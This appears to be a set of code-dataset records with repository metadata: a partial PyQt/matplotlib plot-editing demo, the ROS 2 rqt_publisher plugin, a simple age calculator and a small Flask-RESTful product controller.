super().__init__(parent) #调用父类构造函数,创建窗体
self.ui=Ui_MainWindow() #创建UI对象
self.ui.setupUi(self) #构造UI界面
self.setWindowTitle("Demo14_2, 绘图主要对象的操作")
mplStyle.use("classic") #使用样式,必须在绘图之前调用,修改字体后才可显示汉字
mpl.rcParams['font.sans-serif']=['KaiTi','SimHei'] #显示汉字为 楷体, 汉字不支持 粗体,斜体等设置
mpl.rcParams['font.size']=12
## Windows自带的一些字体
## 黑体:SimHei 宋体:SimSun 新宋体:NSimSun 仿宋:FangSong 楷体:KaiTi
mpl.rcParams['axes.unicode_minus'] =False #减号unicode编码
pass
## ==============自定义功能函数========================
def __createFigure(self):
pass
def __getMag(self,w,zta=0.2,wn=1.0): ##计算幅频曲线的数据
w2=w*w
a1=1-w2/(wn*wn)
b1=a1*a1
b2=4*zta*zta/(wn*wn)*w2
b=np.sqrt(b1+b2)
mag=-20*np.log10(b) #单位dB
return mag
def __drawFig2X1(self): ##初始化绘图
pass
## ==============event处理函数==========================
## ==========由connectSlotsByName()自动连接的槽函数============
##=====ToolBox 第1组:==="Figure操作" 分组里的功能================
##=======1.1 suptitle 图表的标题
def __setFig_suptitle(self,refreshDraw=True): #设置suptitle
pass
@pyqtSlot(bool) ##"1.1 suptitle标题"groupBox
def on_groupBox_suptitle_clicked(self,checked):
pass
@pyqtSlot() ##"设置标题"按钮
def on_btnFig_Title_clicked(self):
self.__setFig_suptitle()
@pyqtSlot(int) ##字体大小
def on_spinFig_Fontsize_valueChanged(self,arg1):
self.__setFig_suptitle()
@pyqtSlot(bool) ##粗体
def on_chkBoxFig_Bold_clicked(self,checked):
self.__setFig_suptitle()
@pyqtSlot(bool) ##斜体
def on_chkBoxFig_Italic_clicked(self,checked):
self.__setFig_suptitle()
@pyqtSlot() ##文字颜色
def on_btnFig_TitleColor_clicked(self):
pass
@pyqtSlot() ##文字背景颜色
def on_btnFig_TitleBackColor_clicked(self):
pass
##=======1.2 背景与边框
@pyqtSlot(bool) ##set_frameon, 显示背景和边框
def on_chkBoxFig_FrameOn_clicked(self,checked):
pass
@pyqtSlot() ##set_facecolor 设置背景颜色
def on_btnFig_FaceColor_clicked(self):
pass
@pyqtSlot(str) ##设置样式
def on_comboFig_Style_currentIndexChanged(self,arg1):
pass
##=====1.3 边距,子图间隔
@pyqtSlot() ## tight_layout, 试验功能
def on_btnFigure_tightLayout_clicked(self):
self.__fig.tight_layout() #对所有子图 进行一次tight_layout
self.__fig.canvas.draw() #刷新
@pyqtSlot(float) ##left margin
def on_spinFig_marginLeft_valueChanged(self,value):
self.__fig.subplots_adjust(left=value)
self.__fig.canvas.draw()
@pyqtSlot(float) ##right margin
def on_spinFig_marginRight_valueChanged(self,value):
self.__fig.subplots_adjust(right=value)
self.__fig.canvas.draw()
@pyqtSlot(float) ##bottom margin
def on_spinFig_marginBottom_valueChanged(self,value):
self.__fig.subplots_adjust(bottom=value)
self.__fig.canvas.draw()
@pyqtSlot(float) ##top margin
def on_spinFig_marginTop_valueChanged(self,value):
self.__fig.subplots_adjust(top=value)
self.__fig.canvas.draw()
@pyqtSlot(float) ## wspace
def on_spinFig_wspace_valueChanged(self,value):
self.__fig.subplots_adjust(wspace=value)
self.__fig.canvas.draw()
@pyqtSlot(float) ## hspace
def on_spinFig_hspace_valueChanged(self,value):
self.__fig.subplots_adjust(hspace=value)
self.__fig.canvas.draw()
##=====ToolBox 第2组:"Axes子图操作" 分组里的功能================
@pyqtSlot(bool) ##子图是否可见
def on_chkBoxAxes_Visible_clicked(self,checked):
pass
##=======2.1 子图标题
def __setAxesTitle(self):
pass
@pyqtSlot(bool) ##"子图标题"GroupBox--CheckBox
def on_groupBox_AxesTitle_clicked(self,checked):
pass
@pyqtSlot() ##"设置标题"按钮
def on_btnAxes_Title_clicked(self):
self.__setAxesTitle() #设置标题
@pyqtSlot(int) ##字体大小
def on_spinAxes_Fontsize_valueChanged(self,arg1):
self.__setAxesTitle()
@pyqtSlot(bool) ##粗体
def on_chkBoxAxes_Bold_clicked(self,checked):
self.__setAxesTitle()
@pyqtSlot(bool) ##斜体
def on_chkBoxAxes_Italic_clicked(self,checked):
self.__setAxesTitle()
@pyqtSlot() ##文字颜色
def on_btnAxes_TitleColor_clicked(self):
pass
@pyqtSlot() ##文字背景颜色
def on_btnAxes_TitleBackColor_clicked(self):
pass
##=======2.2 子图外观
@pyqtSlot(bool) ##set_frame_on, 是否显示背景颜色
def on_chkBoxAxes_FrameOn_clicked(self,checked):
pass
@pyqtSlot() ##set_facecolor 设置背景颜色
def on_btnAxes_FaceColor_clicked(self):
pass
@pyqtSlot(bool) ##grid(),设置X网格可见性
def on_chkBoxAxes_GridX_clicked(self,checked):
pass
@pyqtSlot(bool) ##grid(), 设置Y网格可见性
def on_chkBoxAxes_GridY_clicked(self,checked):
pass
@pyqtSlot(bool) ##set_axis_on和 set_axis_off 显示/隐藏坐标轴
def on_chkBoxAxes_AxisOn_clicked(self,checked):
pass
@pyqtSlot(bool) ## minorticks_on 和 minorticks_off 显示/隐藏次刻度和网格
def on_chkBoxAxes_MinorTicksOn_clicked(self,checked):
pass
##======2.3 图例
@pyqtSlot(bool) ##图例可见
def on_groupBox_AexLegend_clicked(self,checked):
pass
@pyqtSlot(int) ##图例位置
def on_combo_LegendLoc_currentIndexChanged(self,index):
pass
@pyqtSlot(bool) ##图例可拖动
def on_chkBoxLegend_Dragable_clicked(self,checked):
pass
@pyqtSlot() ##重新生成图例
def on_btnLegend_regenerate_clicked(self):
pass
##=====ToolBox 第3组:"子图曲线设置" 分组里的功能================
##======3.1 选择操作的曲线
@pyqtSlot(int) ##选择当前操作曲线
def on_comboAxes_Lines_currentIndexChanged(self,index):
pass
##======3.2 曲线外观
@pyqtSlot(bool) ##曲线可见
def on_groupBox_LineSeries_clicked(self,checked):
pass
@pyqtSlot(str) ##set_linestyle
def on_comboSeries_LineStyle_currentIndexChanged(self,arg1):
pass
@pyqtSlot(int) ##线宽
def on_spinSeries_LineWidth_valueChanged(self,arg1):
pass
@pyqtSlot(str) ##set_drawstyle()
def on_comboSeries_DrawStyle_currentIndexChanged(self,arg1):
pass
@pyqtSlot() ##设置曲线颜色
def on_btnSeries_LineColor_clicked(self):
pass
##======3.3 标记点
@pyqtSlot(bool) ##标记点可见
def on_groupBox_Marker_clicked(self,checked):
pass
@pyqtSlot(str) ##set_marker 标记点形状
def on_comboMarker_Shape_currentIndexChanged(self,arg1):
pass
@pyqtSlot(int) ##set_markersize 标记点大小
def on_spinMarker_Size_valueChanged(self,arg1):
pass
@pyqtSlot() ##标记点颜色
def on_btnMarker_Color_clicked(self):
pass
@pyqtSlot(int) ##set_markeredgewidth 边线线宽
def on_spinMarker_EdgeWidth_valueChanged(self,arg1):
pass
@pyqtSlot() ##set_markeredgecolor边线颜色
def on_btnMarker_EdgeColor_clicked(self):
pass
##=====ToolBox 第4组:==="X坐标轴设置" 分组里的功能================
@pyqtSlot(bool) ##axisX 坐标轴可见型,包括label,tick,ticklabels
def on_groupBox_AxisX_clicked(self,checked):
pass
##======4.1 数据范围======
@pyqtSlot() ## set_xbound 设置范围,与set_xlim,它不管是否反向
def on_btnAxisX_setBound_clicked(self):
pass
@pyqtSlot() ## invert_xaxis 反向toggle
def on_chkBoxAxisX_Invert_clicked(self):
pass
@pyqtSlot(str) ## 设置坐标尺度
def on_comboAxisX_Scale_currentIndexChanged(self,arg1):
pass
##==========4.2 X轴标题
def __setAxisX_Label(self,refreshDraw=True):
pass
@pyqtSlot(bool) ##X 轴标题可见性
def on_groupBox_AxisXLabel_clicked(self,checked):
pass
@pyqtSlot() ##设置X轴Label
def on_btnAxisX_setLabel_clicked(self):
self.__setAxisX_Label()
@pyqtSlot(int) ##字体大小
def on_spinAxisX_LabelFontsize_valueChanged(self,arg1):
self.__setAxisX_Label()
@pyqtSlot(bool) ##粗体
def on_chkBoxAxisX_LabelBold_clicked(self,checked):
self.__setAxisX_Label()
@pyqtSlot(bool) ##斜体
def on_chkBoxAxisX_LabelItalic_clicked(self,checked):
self.__setAxisX_Label()
@pyqtSlot() ##文字颜色
def on_btnAxisX_LabelColor_clicked(self):
color=QColorDialog.getColor() #QColor
if color.isValid():
r,g,b,a=color.getRgbF() #getRgbF(self) -> Tuple[float, float, float, float]
objText=self.__setAxisX_Label(False)
objText.set_color((r,g,b,a)) #文字颜色
self.__fig.canvas.draw()
##======4.3 X轴主刻度标签
@pyqtSlot(bool) ##"4.3主刻度标签"GroupBox,刻度标签可见性
def on_groupBoxAxisX_TickLabel_clicked(self,checked):
pass
@pyqtSlot() ##设置标签格式
def on_btnAxisX_TickLabFormat_clicked(self):
pass
@pyqtSlot() ##文字颜色
def on_btnAxisX_TickLabColor_clicked(self):
pass
@pyqtSlot(int) ##字体大小
def on_spinAxisX_TickLabelFontsize_valueChanged(self,arg1):
pass
@pyqtSlot(bool) ## bottom axis major ticklabel
def on_chkBoxAxisX_TickLabBottom_clicked(self,checked):
pass
@pyqtSlot(bool) ## top axis major ticklabel
def on_chkBoxAxisX_TickLabTop_clicked(self,checked):
pass
##==========4.4 ===主刻度线和主网格线
@pyqtSlot(bool) ##bottom主刻度线
def on_chkBoxX_majorTickBottom_clicked(self,checked):
pass
@pyqtSlot(bool) ##top主刻度线
def on_chkBoxX_majorTickTop_clicked(self,checked):
pass
@pyqtSlot() ##主刻度线颜色
def on_btnLineColorX_majorTick_clicked(self):
pass
@pyqtSlot(bool) ##显示主网格线
def on_chkBoxX_majorGrid_clicked(self,checked):
pass
@pyqtSlot() ##主网格线颜色
def on_btnLineColorX_majorGrid_clicked(self):
pass
@pyqtSlot(str) ##主网格线样式
def on_comboLineStyle_XmajorGrid_currentIndexChanged(self,arg1):
pass
##==========4.5 次刻度线和次网格线
@pyqtSlot(bool) ##bottom次刻度线
def on_chkBoxX_minorTickBottom_clicked(self,checked):
pass
@pyqtSlot(bool) ##top次刻度线
def on_chkBoxX_minorTickTop_clicked(self,checked):
pass
@pyqtSlot() ##次刻度线颜色
def on_btnLineColorX_minorTick_clicked(self):
pass
@pyqtSlot(bool) ##显示次网格线
def on_chkBoxX_minorGrid_clicked(self,checked):
pass
@pyqtSlot() ##次网格线颜色
def on_btnLineColorX_minorGrid_clicked(self):
pass
@pyqtSlot(str) ##次网格线样式
def on_comboLineStyle_XminorGrid_currentIndexChanged(self,arg1):
pass
##=====ToolBox 第5组:==="Y坐标轴设置" 分组里的功能================
@pyqtSlot(bool) ## axisY 坐标轴可见型,包括label,tick,ticklabels
def on_groupBox_AxisY_clicked(self,checked):
pass
##======5.1 数据范围======
@pyqtSlot() ## set_xbound 设置范围,与set_xlim,它不管是否反向
def on_btnAxisY_setBound_clicked(self):
pass
@pyqtSlot() ## invert_xaxis 反向toggle
def on_chkBoxAxisY_Invert_clicked(self):
pass
@pyqtSlot(str) ## 设置坐标尺度
def on_comboAxisY_Scale_currentIndexChanged(self,arg1):
pass
##======5.2 Y轴标题
def __setAxisY_Label(self,refreshDraw=True):
pass
@pyqtSlot(bool) ##Y 轴标题可见性
def on_groupBox_AxisYLabel_clicked(self,checked):
pass
@pyqtSlot() ##设置Y轴Label
def on_btnAxisY_setLabel_clicked(self):
self.__setAxisY_Label()
@pyqtSlot(int) ##字体大小
def on_spinAxisY_LabelFontsize_valueChanged(self,arg1):
self.__setAxisY_Label()
@pyqtSlot(bool) ##粗体
def on_chkBoxAxisY_LabelBold_clicked(self,checked):
self.__setAxisY_Label()
@pyqtSlot(bool) ##斜体
def on_chkBoxAxisY_LabelItalic_clicked(self,checked):
self.__setAxisY_Label()
@pyqtSlot() ##文字颜色
def on_btnAxisY_LabelColor_clicked(self):
color=QColorDialog.getColor() #QColor
if color.isValid():
r,g,b,a=color.getRgbF() #getRgbF(self) -> Tuple[float, float, float, float]
objText=self.__setAxisY_Label(False)
objText.set_color((r,g,b,a)) #文字颜色
self.__fig.canvas.draw() #刷新
##======5.3 Y轴主刻度标签
@pyqtSlot(bool) ##刻度标签可见性
def on_groupBoxAxisY_TickLabel_clicked(self,checked):
pass
@pyqtSlot() ##设置标签格式
def on_btnAxisY_TickLabFormat_clicked(self):
pass
@pyqtSlot() ##文字颜色
def on_btnAxisY_TickLabColor_clicked(self):
color=QColorDialog.getColor()
if color.isValid():
r,g,b,a=color.getRgbF()
for label in self.__curAxes.yaxis.get_ticklabels():
label.set_color((r,g,b,a))
self.__fig.canvas.draw()
@pyqtSlot(int) #字体大小
def on_spinAxisY_TickLabelFontsize_valueChanged(self,arg1):
for label in self.__curAxes.yaxis.get_ticklabels():
label.set_fontsize(arg1)
self.__fig.canvas.draw()
@pyqtSlot(bool) ##Left axis major ticklabel
def on_chkBoxAxisY_TickLabLeft_clicked(self,checked):
pass
@pyqtSlot(bool) ##right axis major ticklabel
def on_chkBoxAxisY_TickLabRight_clicked(self,checked):
pass
##==========5.4 ===主刻度线和主网格线=====
@pyqtSlot(bool) ##显示Left主刻度线
def on_chkBoxY_majorTickLeft_clicked(self,checked):
pass
@pyqtSlot(bool) ##显示Right主刻度线
def on_chkBoxY_majorTickRight_clicked(self,checked):
pass
@pyqtSlot() ##主刻度线颜色
def on_btnLineColorY_majorTick_clicked(self):
pass
@pyqtSlot(bool) ##显示主网格线
def on_chkBoxY_majorGrid_clicked(self,checked):
pass
@pyqtSlot() ##主网格线颜色
def on_btnLineColorY_majorGrid_clicked(self):
pass
@pyqtSlot(str) ##主网格线样式
def on_comboLineStyle_YmajorGrid_currentIndexChanged(self,arg1):
pass
##==========5.5 ===次刻度线和次网格线=====
@pyqtSlot(bool) ##显示Left次刻度线
def on_chkBoxY_minorTickLeft_clicked(self,checked):
pass
@pyqtSlot(bool) ##显示Right次刻度线
def on_chkBoxY_minorTickRight_clicked(self,checked):
pass
@pyqtSlot() ##次刻度线颜色
def on_btnLineColorY_minorTick_clicked(self):
pass
@pyqtSlot(bool) ##显示次网格线
def on_chkBoxY_minorGrid_clicked(self,checked):
pass
@pyqtSlot() ##次网格线颜色
def on_btnLineColorY_minorGrid_clicked(self):
pass
@pyqtSlot(str) ##次网格线样式
def on_comboLineStyle_YminorGrid_currentIndexChanged(self,arg1):
pass
## =============自定义槽函数===============================
@pyqtSlot(int)
def do_currentAxesChaned(self,index): #当前子图切换
pass
## ============窗体测试程序 ================================
if __name__ == "__main__": #用于当前窗体测试
app = QApplication(sys.argv) #创建GUI应用程序
form=QmyMainWindow() #创建窗体
form.show()
sys.exit(app.exec_())
| [
"316790607@qq.com"
] | 316790607@qq.com |
9d7e53e4f1b89ea971dd1e49f599e7919a008497 | 4bab98acf65c4625a8b3c757327a8a386f90dd32 | /ros2-windows/Lib/site-packages/rqt_publisher/publisher.py | ecccbf727b1edfdae4f1dbb37ffd5136f5f52b43 | [] | no_license | maojoejoe/Peach-Thinning-GTRI-Agricultural-Robotics-VIP | e2afb08b8d7b3ac075e071e063229f76b25f883a | 8ed707edb72692698f270317113eb215b57ae9f9 | refs/heads/master | 2023-01-15T06:00:22.844468 | 2020-11-25T04:16:15 | 2020-11-25T04:16:15 | 289,108,482 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 17,547 | py | #!/usr/bin/env python
# Copyright (c) 2011, Dorian Scholz, TU Darmstadt
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of the TU Darmstadt nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from __future__ import division
import array
import math
import random
import time
from python_qt_binding.QtCore import Slot, QSignalMapper, QTimer, qWarning
from rclpy.exceptions import InvalidTopicNameException
from rclpy.qos import QoSProfile
from rqt_gui_py.plugin import Plugin
from .publisher_widget import PublisherWidget
from rqt_py_common.message_helpers import get_message_class
from rqt_py_common.topic_helpers import get_slot_type
_list_types = [list, tuple, array.array]
try:
import numpy
_list_types.append(numpy.ndarray)
except ImportError:
pass
_numeric_types = [int, float]
try:
import numpy
_numeric_types += [
numpy.int8, numpy.int16, numpy.int32, numpy.int64,
numpy.float16, numpy.float32, numpy.float64, numpy.float128,
]
except ImportError:
pass
class Publisher(Plugin):
def __init__(self, context):
super(Publisher, self).__init__(context)
self.setObjectName('Publisher')
self._node = context.node
# create widget
self._widget = PublisherWidget(self._node)
self._widget.add_publisher.connect(self.add_publisher)
self._widget.change_publisher.connect(self.change_publisher)
self._widget.publish_once.connect(self.publish_once)
self._widget.remove_publisher.connect(self.remove_publisher)
self._widget.clean_up_publishers.connect(self.clean_up_publishers)
if context.serial_number() > 1:
self._widget.setWindowTitle(
self._widget.windowTitle() + (' (%d)' % context.serial_number()))
# create context for the expression eval statement
self._eval_locals = {'i': 0}
for module in (math, random, time):
self._eval_locals.update(module.__dict__)
del self._eval_locals['__name__']
del self._eval_locals['__doc__']
self._publishers = {}
self._id_counter = 0
self._timeout_mapper = QSignalMapper(self)
self._timeout_mapper.mapped[int].connect(self.publish_once)
# add our self to the main window
context.add_widget(self._widget)
@Slot(str, str, float, bool)
def add_publisher(self, topic_name, type_name, rate, enabled):
topic_name = str(topic_name)
try:
self._node._validate_topic_or_service_name(topic_name)
except InvalidTopicNameException as e:
qWarning(str(e))
return
publisher_info = {
'topic_name': topic_name,
'type_name': str(type_name),
'rate': float(rate),
'enabled': bool(enabled),
}
self._add_publisher(publisher_info)
def _add_publisher(self, publisher_info):
publisher_info['publisher_id'] = self._id_counter
self._id_counter += 1
publisher_info['counter'] = 0
publisher_info['enabled'] = publisher_info.get('enabled', False)
publisher_info['expressions'] = publisher_info.get('expressions', {})
publisher_info['message_instance'] = self._create_message_instance(
publisher_info['type_name'])
if publisher_info['message_instance'] is None:
return
msg_module = get_message_class(publisher_info['type_name'])
if not msg_module:
raise RuntimeError(
'The passed message type "{}" is invalid'.format(publisher_info['type_name']))
# Topic name provided was relative, remap to node namespace (if it was set)
if not publisher_info['topic_name'].startswith('/'):
publisher_info['topic_name'] = \
self._node.get_namespace() + publisher_info['topic_name']
# create publisher and timer
publisher_info['publisher'] = self._node.create_publisher(
msg_module, publisher_info['topic_name'], qos_profile=QoSProfile(depth=10))
publisher_info['timer'] = QTimer(self)
# add publisher info to _publishers dict and create signal mapping
self._publishers[publisher_info['publisher_id']] = publisher_info
self._timeout_mapper.setMapping(publisher_info['timer'], publisher_info['publisher_id'])
publisher_info['timer'].timeout.connect(self._timeout_mapper.map)
if publisher_info['enabled'] and publisher_info['rate'] > 0:
publisher_info['timer'].start(int(1000.0 / publisher_info['rate']))
self._widget.publisher_tree_widget.model().add_publisher(publisher_info)
@Slot(int, str, str, str, object)
def change_publisher(self, publisher_id, topic_name, column_name, new_value, setter_callback):
handler = getattr(self, '_change_publisher_%s' % column_name, None)
if handler is not None:
new_text = handler(self._publishers[publisher_id], topic_name, new_value)
if new_text is not None:
setter_callback(new_text)
def _change_publisher_topic(self, publisher_info, topic_name, new_value):
publisher_info['enabled'] = (new_value and new_value.lower() in ['1', 'true', 'yes'])
# qDebug(
# 'Publisher._change_publisher_enabled(): %s enabled: %s' %
# (publisher_info['topic_name'], publisher_info['enabled']))
if publisher_info['enabled'] and publisher_info['rate'] > 0:
publisher_info['timer'].start(int(1000.0 / publisher_info['rate']))
else:
publisher_info['timer'].stop()
return None
def _change_publisher_type(self, publisher_info, topic_name, new_value):
type_name = new_value
# create new slot
slot_value = self._create_message_instance(type_name)
# find parent slot
slot_path = topic_name[len(publisher_info['topic_name']):].strip('/').split('/')
parent_slot = eval('.'.join(["publisher_info['message_instance']"] + slot_path[:-1]))
# find old slot
slot_name = slot_path[-1]
slot_index = parent_slot.__slots__.index(slot_name)
# restore type if user value was invalid
if slot_value is None:
qWarning('Publisher._change_publisher_type(): could not find type: %s' % (type_name))
return parent_slot._slot_types[slot_index]
else:
# replace old slot
parent_slot._slot_types[slot_index] = type_name
setattr(parent_slot, slot_name, slot_value)
self._widget.publisher_tree_widget.model().update_publisher(publisher_info)
def _change_publisher_rate(self, publisher_info, topic_name, new_value):
try:
rate = float(new_value)
except Exception:
qWarning('Publisher._change_publisher_rate(): could not parse rate value: %s' %
(new_value))
else:
publisher_info['rate'] = rate
# qDebug(
# 'Publisher._change_publisher_rate(): %s rate changed: %fHz' %
# (publisher_info['topic_name'], publisher_info['rate']))
publisher_info['timer'].stop()
if publisher_info['enabled'] and publisher_info['rate'] > 0:
publisher_info['timer'].start(int(1000.0 / publisher_info['rate']))
# make sure the column value reflects the actual rate
return '%.2f' % publisher_info['rate']
def _change_publisher_expression(self, publisher_info, topic_name, new_value):
expression = str(new_value)
if len(expression) == 0:
if topic_name in publisher_info['expressions']:
del publisher_info['expressions'][topic_name]
# qDebug(
# 'Publisher._change_publisher_expression(): removed expression'
# 'for: %s' % (topic_name))
else:
# Strip topic name from the full topic path
slot_path = topic_name.replace(publisher_info['topic_name'], '', 1)
slot_path, slot_array_index = self._extract_array_info(slot_path)
# Get the property type from the message class
slot_type, is_array = \
get_slot_type(publisher_info['message_instance'].__class__, slot_path)
if slot_array_index is not None:
is_array = False
if is_array:
slot_type = list
# strip possible trailing error message from expression
error_prefix = '# error'
error_prefix_pos = expression.find(error_prefix)
if error_prefix_pos >= 0:
expression = expression[:error_prefix_pos]
success, _ = self._evaluate_expression(expression, slot_type)
if success:
old_expression = publisher_info['expressions'].get(topic_name, None)
publisher_info['expressions'][topic_name] = expression
try:
self._fill_message_slots(
publisher_info['message_instance'], publisher_info['topic_name'],
publisher_info['expressions'], publisher_info['counter'])
except Exception as e:
if old_expression is not None:
publisher_info['expressions'][topic_name] = old_expression
else:
del publisher_info['expressions'][topic_name]
return '%s %s: %s' % (expression, error_prefix, e)
return expression
else:
return '%s %s evaluating as "%s"' % (
expression, error_prefix, slot_type.__name__)
def _extract_array_info(self, type_str):
array_size = None
if '[' in type_str and type_str[-1] == ']':
type_str, array_size_str = type_str.split('[', 1)
array_size_str = array_size_str[:-1]
if len(array_size_str) > 0:
array_size = int(array_size_str)
else:
array_size = 0
return type_str, array_size
def _create_message_instance(self, type_str):
base_type_str, array_size = self._extract_array_info(type_str)
try:
base_message_type = get_message_class(base_type_str)
except LookupError as e:
qWarning("Creating message type {} failed. Please check your spelling and that the "
"message package has been built\n{}".format(base_type_str, e))
return None
if base_message_type is None:
return None
if array_size is not None:
message = []
for _ in range(array_size):
message.append(base_message_type())
else:
message = base_message_type()
return message
def _evaluate_expression(self, expression, slot_type):
global _list_types
global _numeric_types
successful_eval = True
try:
# try to evaluate expression
value = eval(expression, {}, self._eval_locals)
except Exception as e:
qWarning('Python eval failed for expression "{}"'.format(expression) +
' with an exception "{}"'.format(e))
successful_eval = False
if slot_type is str:
if successful_eval:
value = str(value)
else:
# for string slots just convert the expression to str, if it did not
# evaluate successfully
value = str(expression)
successful_eval = True
elif successful_eval:
type_set = set((slot_type, type(value)))
# check if value's type and slot_type belong to the same type group, i.e. array types,
# numeric types and if they do, make sure values's type is converted to the exact
# slot_type
if type_set <= set(_list_types) or type_set <= set(_numeric_types):
# convert to the right type
value = slot_type(value)
if successful_eval and isinstance(value, slot_type):
return True, value
else:
qWarning('Publisher._evaluate_expression(): failed to evaluate ' +
'expression: "%s" as Python type "%s"' % (
expression, slot_type))
return False, None
def _fill_message_slots(self, message, topic_name, expressions, counter):
global _list_types
if topic_name in expressions and len(expressions[topic_name]) > 0:
# get type
if hasattr(message, '_type'):
message_type = message._type
else:
message_type = type(message)
self._eval_locals['i'] = counter
success, value = self._evaluate_expression(expressions[topic_name], message_type)
if not success:
value = message_type()
return value
# if no expression exists for this topic_name, continue with it's child slots
elif hasattr(message, 'get_fields_and_field_types'):
for slot_name in message.get_fields_and_field_types().keys():
value = self._fill_message_slots(
getattr(message, slot_name),
topic_name + '/' + slot_name, expressions, counter)
if value is not None:
setattr(message, slot_name, value)
elif type(message) in _list_types and (len(message) > 0):
for index, slot in enumerate(message):
value = self._fill_message_slots(
slot, topic_name + '[%d]' % index, expressions, counter)
# this deals with primitive-type arrays
if not hasattr(message[0], '__slots__') and value is not None:
message[index] = value
return None
@Slot(int)
def publish_once(self, publisher_id):
publisher_info = self._publishers.get(publisher_id, None)
if publisher_info is not None:
publisher_info['counter'] += 1
self._fill_message_slots(
publisher_info['message_instance'],
publisher_info['topic_name'],
publisher_info['expressions'],
publisher_info['counter'])
publisher_info['publisher'].publish(publisher_info['message_instance'])
@Slot(int)
def remove_publisher(self, publisher_id):
publisher_info = self._publishers.get(publisher_id, None)
if publisher_info is not None:
publisher_info['timer'].stop()
self._node.destroy_publisher(publisher_info['publisher'])
del publisher_info['publisher']
del self._publishers[publisher_id]
def save_settings(self, plugin_settings, instance_settings):
publisher_copies = []
for publisher in self._publishers.values():
publisher_copy = {}
publisher_copy.update(publisher)
publisher_copy['enabled'] = False
del publisher_copy['timer']
del publisher_copy['message_instance']
del publisher_copy['publisher']
publisher_copies.append(publisher_copy)
instance_settings.set_value('publishers', repr(publisher_copies))
def restore_settings(self, plugin_settings, instance_settings):
# If changing perspectives and rqt_publisher is already loaded, we need to clean up the
# previously existing publishers
self.clean_up_publishers()
publishers = eval(instance_settings.value('publishers', '[]'))
for publisher in publishers:
self._add_publisher(publisher)
def clean_up_publishers(self):
self._widget.publisher_tree_widget.model().clear()
for publisher_info in self._publishers.values():
publisher_info['timer'].stop()
self._node.destroy_publisher(publisher_info['publisher'])
self._publishers = {}
def shutdown_plugin(self):
self._widget.shutdown_plugin()
self.clean_up_publishers()
| [
"aidencfarrar@gmail.com"
] | aidencfarrar@gmail.com |
66bb9bb7d3369de9b8f56dc1430be5a5e4df12de | 79ce28667bb9a954e2d9292d7c80d7a6fbd68c2a | /python lab/python/AgeConvert.py | 4ad0cc1bff8c169204d09ec66049e3c03f7da747 | [] | no_license | AshayFernandes/PythonPrograms | c1084af9e821aa9d6f992dff4f7491de78069cad | 80f67700a0cd2ef247d8d02ed3531296a48c2faa | refs/heads/master | 2021-06-25T04:46:56.447271 | 2021-04-05T17:20:21 | 2021-04-05T17:20:21 | 206,642,263 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,017 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Nov 12 11:17:13 2019
@author: Ashay Fernandes
"""
from datetime import date
def AgeConvert(value):
today=date.today()
today=str(today)
value=value.split('-')
today=today.split('-')
print(today)
lyst=[]
for i in range(0,3):
lyst.append(int(today[i])-int(value[i]))
print(lyst)
totaldays=lyst[0]*365.25
print(totaldays)
if(lyst[1]<0):
totaldays=totaldays-abs(lyst[1])*30.5
else:
totaldays=totaldays+lyst[1]*30.5
if(lyst[2]<0):
totaldays=totaldays-abs(lyst[2])
else:
totaldays=totaldays+lyst[2]
print(totaldays)
age=[]
year=totaldays % 365.25
age.append(totaldays//365.25)
days=year%30.5
age.append(year//30.5)
age.append(int(days))
return age
age=AgeConvert(input("enter your DOB in YEAR-MONTH-DAY format"))
print('your age is{0[0]} years {0[1]} month {0[2]} days'.format(age))
| [
"noreply@github.com"
] | AshayFernandes.noreply@github.com |
06f57a28cdaadfb1292a76ea642bacf76068664b | 8f33f62d1787980b55a6334cebb51dde54a007f5 | /Semana8/libreria/controllers/producto.py | 0eae5c271772c9aab5923a0fc8df12ee0547360d | [
"MIT"
] | permissive | GuidoTorres/codigo8 | 012a280cbc1f90415c280c29c5cdff51d42f4508 | 7fdff4f677f048de7d7877b96ec3a688d3dde163 | refs/heads/master | 2023-01-11T02:57:35.487104 | 2019-12-10T18:04:13 | 2019-12-10T18:04:13 | 214,514,926 | 0 | 0 | MIT | 2023-01-07T17:48:31 | 2019-10-11T19:32:40 | JavaScript | UTF-8 | Python | false | false | 1,306 | py | from flask_restful import Resource, reqparse
from libreria.models.producto import ProductoModel
class Producto(Resource):
parser = reqparse.RequestParser()
parser.add_argument(
'nombre_producto',
type= str,
required = True,
help = "Falta el nombre_producto"
)
parser.add_argument(
'categoria',
type= str,
required = True,
help = "Falta categoria"
)
def get(self, nombre):
# Selefc * from producto where desc = nombre
# Query.fetchone()
producto = ProductoModel.query.filter_by(desc = nombre).first()
if producto:
return producto.devolverjson()
return {'message' : 'No existe el producto'}, 404
def post(self):
data = Producto.parser.parse_args()
producto = ProductoModel(data['nombre_producto'],data['categoria'])
try:
producto.guardar_en_bd()
except:
return{'message': 'Hubo un error al guardar en la base de datos'}, 500
return {'message': 'Se guardo el producto exitosamente', 'producto' : data['nombre_producto']}
return {'message': 'Se guardo la categoria exitosamente', 'categoria' : data['categoria']} | [
"migueldavid006@hotmail.com"
